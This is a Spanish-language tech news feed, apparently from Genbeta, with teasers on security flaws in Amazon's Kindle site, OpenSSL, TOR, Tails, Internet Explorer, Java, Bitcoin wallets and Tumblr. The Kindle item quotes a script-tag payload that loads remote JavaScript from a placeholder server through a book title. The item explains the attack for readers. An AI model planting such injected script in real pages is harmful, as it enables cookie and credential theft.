feed

Vulnerabilidad

Los ataques XSS (cross-site scripting) llevan tiempo siendo una amenaza a la hora de utilizar sitios Web para, por ejemplo, robar cookies y capturar así una sesión en un sitio Web. Y existe una vulnerabilidad en Amazon.com que permite que un libro en nuestro Kindle pueda transferir nuestras credenciales a alguien con malas intenciones.

El mecanismo es realmente simple: si un libro electrónico tiene por título algo como <script src="https://servidor/script.js"></script>, la Web de Amazon...

Leer más »

Cada vez nos sorprendemos menos ante este tipo de noticias. Pongamos la situación: queremos ver un simple vídeo y accedemos a él a través de un enlace totalmente inocuo. Esa acción no es peligrosa... pero al llevarla a cabo podríamos acabar siendo espiados. Una serie de empresas están vendiendo una serie de soluciones que prácticamente son plug and play.

Basta con conectar el dispositivo a puntos...

Leer más »

TOR lleva muchos meses en boca de los usuarios que pueblan la red de redes. Desde que Edward Snowden publicó algunos documentos en los que afirmaba que estabamos siendo vigilados por diversas agencias gubernamentales, no han sido pocos los internautas que han estado utilizando la herramienta con el fin de proteger sus comunicaciones . Pero, a la vez, ha habido gente que ha estado intentando...

Leer más »

Estamos seguros de que muchos conoceréis la distribución Linux Tails. No en vano, era recomendada hace unos meses por Edward Snowden, quien comentaba que era la más segura y, por lo tanto, la que él utilizaba para navegar por Internet. Un software que nos permitía estar en la red sin dejar rastro y sin la necesidad de realizar complicadas configuraciones.

Sin embargo, los encargados del paquete...

Leer más »

Resulta curioso como, en cuestión de meses, la imagen que teníamos de OpenSSL como un producto que garantizaba nuestra seguridad en Internet se ha desvanecido. Después de Heartbleed surgieron varias iniciativas para "asegurar" la librería. El equipo de OpenBSD, por ejemplo, se puso a trabajar en el fork LibreSSL para tratar de purgar todos los fallos de la librería original. Otros investigadores...

Leer más »

¿Nunca os habéis preguntado cómo es posible que con sólo abrir una página web o un fichero creado para la ocasión, los hackers sean capaces de aprovecharse de una vulnerabilidad y tomar el control de un ordenador? Tenemos un ejemplo muy reciente de esto en el fallo de Internet Explorer descubierto hace unos días. Un objeto Flash especialmente preparado que permite a un atacante tomar control de...

Leer más »

Estos días os hemos contado que varios servicios de transacciones monetarias con Bitcoin han tenido que restringir la retirada de dinero, como ha sido el caso de MtGox y el de Bitstamp. Y en ambos casos hemos aludido a un problema técnico que concernía a la implementación de muchas carteras de Bitcoin.

¿Qué está pasando exactamente? Como resumen, existen incoherencias en la implementación de...

Leer más »

Tumblr ha lanzado hace tan solo unas horas una actualización importante de seguridad de su aplicación para iOS. Desde su blog de Staff han informado que con ella se resuelve una vulnerabilidad que permitía que la contraseña fuese capturada en tránsito en algunas versiones de la aplicación.

Según han comunicado a The Next Web desde la compañía, ayer tuvieron conocimiento de esta vulnerabilidad y...

Leer más »

Parece que a pesar de los esfuerzos de Microsoft en mejorar su navegador, Internet Explorer sigue teniendo agujeros de seguridad. El último que se ha descubierto afecta a todas las versiones desde la sexta, y permite a cualquier página seguir todos los movimientos del ratón, incluso con la ventana minimizada o inactiva.

El exploit de la vulnerabilidad es bastante sencillo conceptualmente. Se...

Leer más »

Se ha descubierto una nueva vulnerabilidad en la máquina virtual Java de Oracle, afectando a las versiones 5, 6 y 7. Esta permitiría a un atacante ejecutar código fuera del sandbox de Java en cualquier máquina que ejecute un applet o una aplicación especialmente programada para ello.

En principio esta vulnerabilidad se manifiesta en cualquier navegador ejecutándose en cualquier versión de...

Leer más »

Sigue a Genbeta